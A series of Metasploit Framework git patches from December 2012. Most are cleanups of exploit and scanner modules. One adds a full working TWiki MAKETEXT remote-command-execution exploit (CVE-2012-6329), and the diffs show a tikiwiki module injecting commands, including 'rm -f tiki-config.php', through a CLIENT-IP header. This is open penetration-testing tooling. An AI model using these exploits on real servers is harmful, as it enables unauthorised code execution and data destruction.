0 + print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0 if datastore['DEPLOY'] print_status("Ready to deploy a payload #{name}") if datastore['DEPLOYLIST']=="" @@ -436,12 +436,12 @@ class Metasploit3 < Msf::Exploit::Remote end end else - print_error("\t - Unable to enable xp_cmdshell on " + path.last) + print_error("\t - Unable to enable xp_cmdshell on " + name) end # Revert soa and xp_cmdshell to original state if xpcmdOrig == 0 and xpcmdNow == 1 - print_status("\t - Disabling xp_cmdshell on " + path.last) + print_status("\t - Disabling xp_cmdshell on " + name) execute = "sp_configure 'xp_cmdshell',0;reconfigure" sql = query_builder_rpc(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore From 4f3c6f973d26bf5203bb61c3f4254f413f1688f7 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Thu, 13 Dec 2012 15:35:34 -0600 Subject: [PATCH 023/154] Changes to BAP session storage. [SEERM #7294] [Bug #40937817] * exploit/multi/handler no longer filtered out from vuln creation and other steps * Name changed to parent module's name in session storage so we show something more helpful than generic handler * Same for vuln and attempt creation --- lib/msf/core/db.rb | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 030c1d9aad..1749c08b4e 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -675,6 +675,13 @@ class DBManager if sess_data[:desc] sess_data[:desc] = sess_data[:desc][0,255] end + + # In the case of multi handler we cannot yet determine the true + # exploit responsible. But we can at least show the parent versus + # just the generic handler: + if session.via_exploit == "exploit/multi/handler" + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + end s = ::Mdm::Session.new(sess_data) s.save! @@ -684,19 +691,26 @@ class DBManager end # If this is a live session, we know the host is vulnerable to something. - # If the exploit used was multi/handler, though, we don't know what - # it's vulnerable to, so it isn't really useful to save it. - if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler" + if opts[:session] and session.via_exploit return unless host mod = framework.modules.create(session.via_exploit) + + if session.via_exploit == "exploit/multi/handler" + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + else + mod_name = mod.name + mod_fullname = mod.fullname + end + vuln_info = { :host => host.address, - :name => mod.name, + :name => mod_name, :refs => mod.references, :workspace => wspace, :exploited_at => Time.now.utc, - :info => "Exploited by #{mod.fullname} to create Session #{s.id}" + :info => "Exploited by #{mod_fullname} to create Session #{s.id}" } port = session.exploit_datastore["RPORT"] @@ -706,10 +720,15 @@ class DBManager vuln = framework.db.report_vuln(vuln_info) + if session.via_exploit == "exploit/multi/handler" + via_exploit = sess_data[:datastore]['ParentModule'] + else + via_exploit = session.via_exploit + end attempt_info = { :timestamp => Time.now.utc, :workspace => wspace, - :module => session.via_exploit, + :module => via_exploit, :username => session.username, :refs => mod.references, :session_id => s.id, From b3c0c6175d7fd0218494bfff93a9b5cdcdd56e73 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 20 Dec 2012 14:45:18 -0600 Subject: [PATCH 024/154] FixRM #3398 by removing double user-agent headers --- modules/exploits/unix/webapp/awstats_configdir_exec.rb | 1 - modules/exploits/unix/webapp/awstats_migrate_exec.rb | 1 - .../exploits/unix/webapp/awstatstotals_multisort.rb | 1 - modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 10 +--------- modules/exploits/windows/http/sybase_easerver.rb | 1 - 5 files changed, 1 insertion(+), 13 deletions(-) diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index 33bf1006c7..ddd25efe25 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -84,7 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 9d9610bd3d..0dee3ecd41 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 371efa6070..4b4bf0238f 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index 05fd0f40e0..c169b843fe 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -65,12 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw( { 'uri' => datastore['URI'] + "/tiki-index.php", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', - 'Connection' => 'Close', - } + 'method' => 'GET' }, 25) http_fingerprint({ :response => res }) # check method @@ -150,7 +145,6 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data, 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a', 'Connection' => 'Close', } @@ -171,7 +165,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'CLIENT-IP' => "#{cmd};", 'Connection' => 'Close', } @@ -201,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'CLIENT-IP' => 'rm -f tiki-config.php', 'Connection' => 'Close', } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index cb290a7add..c67aa259d0 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -79,7 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { 'Accept' => '*/*', - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', } }, 5) From e237512bd719b67c0f1a744c7589450e424b2750 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 21 Dec 2012 10:47:45 +0100 Subject: [PATCH 025/154] Cleaned up the SAP modules as they are all sending double user-agent strings (also added OptEnum where appropriate) --- .../scanner/http/sap_businessobjects_user_brute.rb | 6 +----- .../scanner/http/sap_businessobjects_user_brute_web.rb | 6 +----- .../scanner/http/sap_businessobjects_user_enum.rb | 6 +----- .../scanner/http/sap_businessobjects_version_enum.rb | 6 +----- modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 3 +-- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 6 +----- .../auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb | 7 +------ .../auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb | 6 +----- modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 6 +----- modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb | 4 ++-- .../scanner/sap/sap_mgmt_con_getprocessparameter.rb | 6 +----- .../scanner/sap/sap_mgmt_con_instanceproperties.rb | 6 +----- .../auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb | 8 ++------ .../auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb | 5 +---- modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb | 5 +---- 15 files changed, 17 insertions(+), 69 deletions(-) diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index d095e0ce50..602524000c 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -48,11 +48,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => "/dswsbobje/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index 37a9d4e42b..cc3614f4e1 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -44,11 +44,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => "/PlatformServices/service/app/logon.object", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index d07a68648a..f6340d18f7 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -50,11 +50,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index c5e34fa11e..c69bdf58dd 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -49,11 +49,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res or res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index 77071e052f..0e27e4a4c6 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -47,8 +47,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => {'User-Agent' => datastore['UserAgent']} + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 5c69b3554c..8b09e14a0a 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -52,11 +52,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b13e062236..8e8fec1e8c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -50,12 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index f10883a279..02ab323839 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -50,11 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index a826dd39e0..45e07bef1b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -50,11 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ca733c40e4..4be9c8d3a3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -41,8 +41,8 @@ class Metasploit4 < Msf::Auxiliary Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('RFILE', [ true, 'The name of the file to download ', 'sapstart.log']), - OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']), - OptBool.new('GETALL', [ false, 'Download all available files (WARNING: may take long!)', false]), + OptEnum.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE', ['TRACEFILE','LOGFILE']]), + OptBool.new('GETALL', [ false, 'Download all available files (WARNING: may take a long time!)', false]) ], self.class) register_autofilter_ports([ 50013 ]) deregister_options('RHOST') diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index 817c93bc26..c09b0f87b9 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -51,11 +51,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index 2a5e8b35e0..9cb63e23f2 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -50,11 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index b94bbdffd7..261da9b14a 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -39,7 +39,7 @@ class Metasploit4 < Msf::Auxiliary [ Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), - OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']), + OptEnum.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE', ['TRACEFILE','LOGFILE']]) ], self.class) register_autofilter_ports([ 50013 ]) deregister_options('RHOST') @@ -52,11 +52,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 6b81f6c5fc..1a3655af32 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -50,10 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 37d33dc83c..11a8367c7f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -50,10 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res From 76cad3dd4c332557c79dc517a161e9a7fbd5809b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 21 Dec 2012 11:30:04 +0100 Subject: [PATCH 026/154] Added module for CVE-2012-6329 --- .../exploits/unix/webapp/twiki_maketext.rb | 232 ++++++++++++++++++ 1 file changed, 232 insertions(+) create mode 100644 modules/exploits/unix/webapp/twiki_maketext.rb diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb new file mode 100644 index 0000000000..229a40184c --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -0,0 +1,232 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki MAKETEXT Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MAKETEXT Twiki variable. Using a + specially crafted MAKETEXT, a malicious user can execute shell commands since user + input is passed to the Perl "eval" command without first being sanitized. The + problem is caused by an underlying security issue in the CPAN:Locale::Maketext + module. This works in TWiki sites that have user interface localization enabled + (UserInterfaceInternationalisation variable set). + + If USERNAME and PASSWORD credentials aren't provided anonymous access will be + intended. On the other hand, if the TwikiPage option isn't provided, the module + will try to create a random page on the SandBox space. The modules has been tested + successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 + virtual machine. + }, + 'Author' => + [ + 'George Clark', # original discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6329' ], + [ 'OSVDB', '88460' ], + [ 'BID', '56950' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ] + ], + 'Privileged' => false, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => '', + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic ruby python bash telnet', + } + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Dec 15 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]), + OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]), + OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), + OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) + ], self.class) + end + + def do_login(username, password) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}do/login", + 'vars_post' => + { + 'username' => username, + 'password' => password + } + }) + + if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + return nil + end + + session = $1 + return session + end + + def inject_code(session, code) + + vprint_status("Retrieving the crypttoken...") + + res = send_request_cgi({ + 'uri' => "#{@base}do/edit#{@page}", + 'cookie' => "TWIKISID=#{session}", + 'vars_get' => + { + 'nowysiwyg' => '1' + } + }) + + if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/ + vprint_error("Error retrieving the crypttoken") + return nil + end + + crypttoken = $1 + vprint_good("crypttoken found: #{crypttoken}") + + if session.empty? + if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + session = $1 + else + vprint_error("Error using anonymous access") + return nil + end + end + + vprint_status("Injecting the payload...") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}do/save#{@page}", + 'cookie' => "TWIKISID=#{session}", + 'vars_post' => + { + 'crypttoken' => crypttoken, + 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%" + } + }) + + if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/ + print_warning("Error injecting the payload") + print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}" + return nil + end + + location = URI(res.headers['Location']).path + print_good("Payload injected on #{location}") + + return location + end + + def check + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + res = send_request_cgi({ + 'uri' => "#{@base}do/view/TWiki/WebHome" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/ + version = $1 + print_status("Version found: #{version}") + if version < "5.1.3" + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + return Exploit::CheckCode::Detected + end + + + def exploit + + # Init variables + @page = '' + + if datastore['TwikiPage'] and not datastore['TwikiPage'].empty? + @page << '/' if datastore['TwikiPage'][0] != '/' + @page << datastore['TwikiPage'] + else + @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}" + end + + @base = target_uri.path + @base << '/' if @base[-1, 1] != '/' + + # Login if needed + if (datastore['USERNAME'] and + not datastore['USERNAME'].empty? and + datastore['PASSWORD'] and + not datastore['PASSWORD'].empty?) + print_status("Trying login to get session ID...") + session = do_login(datastore['USERNAME'], datastore['PASSWORD']) + else + print_status("Using anonymous access...") + session = "" + end + + if not session + fail_with(Exploit::Failure::Unknown, "Error getting a session ID") + end + + # Inject payload + print_status("Trying to inject the payload on #{@page}...") + res = inject_code(session, payload.encoded) + if not res + fail_with(Exploit::Failure::Unknown, "Error injecting the payload") + end + + # Execute payload + print_status("Executing the payload through #{res}...") + res = send_request_cgi({ + 'uri' => res, + 'cookie' => "TWIKISID=#{session}" + }) + if not res or res.code != 200 or res.body !~ /HASH/ + fail_with(Exploit::Failure::Unknown, "Error executing the payload") + end + + print_good("Exploitation was successful") + + end + +end + +=begin + +* Trigger: + +%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% + +=end \ No newline at end of file From 413b75cd8b9bd0277dd3c3212a9404ebdb4373e9 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 21 Dec 2012 12:07:14 +0100 Subject: [PATCH 027/154] Fixed crash issues with unescape Added better formatting to avoid pages of output --- .../sap/sap_mgmt_con_instanceproperties.rb | 23 +++++++------------ 1 file changed, 8 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index 2a5e8b35e0..87c27bc3c6 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -50,11 +50,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res @@ -213,7 +209,6 @@ class Metasploit4 < Msf::Auxiliary :data => {:proto => "soap", :igsurl => igsurl}) end if dbstring - dbstring = CGI.unescapeHTML(dbstring) print_good("#{rhost}:#{rport} [SAP] ABAP DATABASE: #{dbstring}") report_note(:host => rhost, :proto => 'tcp', @@ -223,7 +218,6 @@ class Metasploit4 < Msf::Auxiliary :update => :unique_data ) end if j2eedbstring - j2eedbstring = CGI.unescapeHTML(j2eedbstring) print_good("#{rhost}:#{rport} [SAP] J2EE DATABASE: #{j2eedbstring}") report_note(:host => rhost, :proto => 'tcp', @@ -234,10 +228,8 @@ class Metasploit4 < Msf::Auxiliary end if protectedweb protectedweb_arr = protectedweb.split(",") - print_good("#{rhost}:#{rport} [SAP] Protected Webmethods (auth required) :") - protectedweb_arr.each do | pweb | - print_status("#{pweb}") - end + print_good("#{rhost}:#{rport} [SAP] Protected Webmethods (auth required) :::") + print_status("#{protectedweb}") report_note(:host => rhost, :proto => 'tcp', :port => rport, @@ -246,12 +238,14 @@ class Metasploit4 < Msf::Auxiliary :update => :unique_data ) end if webmethods + webmethods_output = [] # create empty webmethods array webmethods_arr = webmethods.split(",") - print_good("#{rhost}:#{rport} [SAP] Unprotected Webmethods :") + print_good("#{rhost}:#{rport} [SAP] Unprotected Webmethods :::") webmethods_arr.each do | webm | - # Only print webmethods not found in protectedweb_arr - print_status("#{webm}") if not protectedweb_arr.include?(webm) + # Only add webmethods not found in protectedweb_arr + webmethods_output << webm if not protectedweb_arr.include?(webm) end + print_status("#{webmethods_output.join(',')}") if webmethods_output report_note(:host => rhost, :proto => 'tcp', :port => rport, @@ -259,7 +253,6 @@ class Metasploit4 < Msf::Auxiliary :data => {:proto => "soap", :webmethods => webmethods}, :update => :unique_data ) end - return elsif fault print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") From a7ea53ddf006e94452f97f9bdcbc926fcf2ab714 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 21 Dec 2012 09:48:13 -0600 Subject: [PATCH 028/154] Update CONTRIBUTING.md Add in a very short plea about repro steps. --- CONTRIBUTING.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 33ec8a38e6..c98decf347 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to first](https://dev.metasploit.com/redmine/account/register). Don't worry, it's easy and fun and takes about 30 seconds. +When you file a bug report, please inclue your **steps to reproduce**, +full copy-pastes of Ruby stack traces, and any relevant details about +your environment. Without repro steps, your bug will likely be closed. +With repro steps, your bugs will likely be fixed. + ## Contributing Metasploit Modules If you have an exploit that you'd like to contribute to the Metasploit From 2bb7b5ea11c8f76a0d511738a1b294508480a3ed Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 21 Dec 2012 09:59:54 -0600 Subject: [PATCH 029/154] Fixes error message for badchar Note that only a custom module that allows for users to pass arguments to nmap would be capable of hitting the error condition. Right now, only auxiliary/scanner/oracle/oracle_login traverses the codepath, and that doesn't allow for arbitrary args passed to nmap. So... without contriving an example, it should be impossible to experience or test. [FixRM #7641] --- lib/msf/core/auxiliary/nmap.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index 2f40def8b5..56f6cad19f 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb @@ -224,7 +224,7 @@ def nmap_validate_arg(str) disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n badchar = str[disallowed_characters] if badchar - print_error "Malformed nmap arguments (contains '#{c}'): #{str}" + print_error "Malformed nmap arguments (contains 